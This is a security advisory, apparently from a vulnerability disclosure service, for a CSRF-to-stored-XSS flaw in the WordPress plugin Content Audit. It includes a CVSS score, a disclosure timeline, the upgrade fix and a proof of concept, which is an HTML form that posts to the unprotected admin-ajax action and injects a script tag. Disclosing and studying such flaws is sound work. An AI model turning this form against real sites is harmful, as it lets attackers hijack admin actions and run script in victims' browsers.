CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can


Last revised:

The plugin contains an admin_ajax action which is not protected with a nonce. One of the values submitted appears unescaped on the list of pages.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

  1. Install/activate the plugin
  2. Make sure you have a post with ID=2 (or edit the HTML provided below)
  3. Settings > Content Audit > select at least “Pages” for “Audited content types”
  4. Visit a page containing the below HTML
  5. Click submit
  6. Visit http://localhost/wp-admin/edit.php?post_type=page to receive the XSS payload
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit">
 <input type="text" name="post_ids[]" value="2">
 <input type="text" name="_content_audit_owner" value="Elliot Alderson">
 <input type="text" name="_content_audit_expiration_date" value="2020-01-01">
 <input type="text" name="_content_audit_notes" value="&lt;script>alert(1)&lt;/script>">
 <input type="submit">


Advisory timeline

  • 2017-08-21: Discovered
  • 2017-09-08: Reported to vendor by email
  • 2017-09-08: First response from vendor
  • 2017-09-08: Vendor reports fixed in 1.9.2
  • 2017-09-26: Advisory published
  • 2017-09-26: Requested CVE

Mitigation/further actions

Upgrade to version 1.9.2 or later.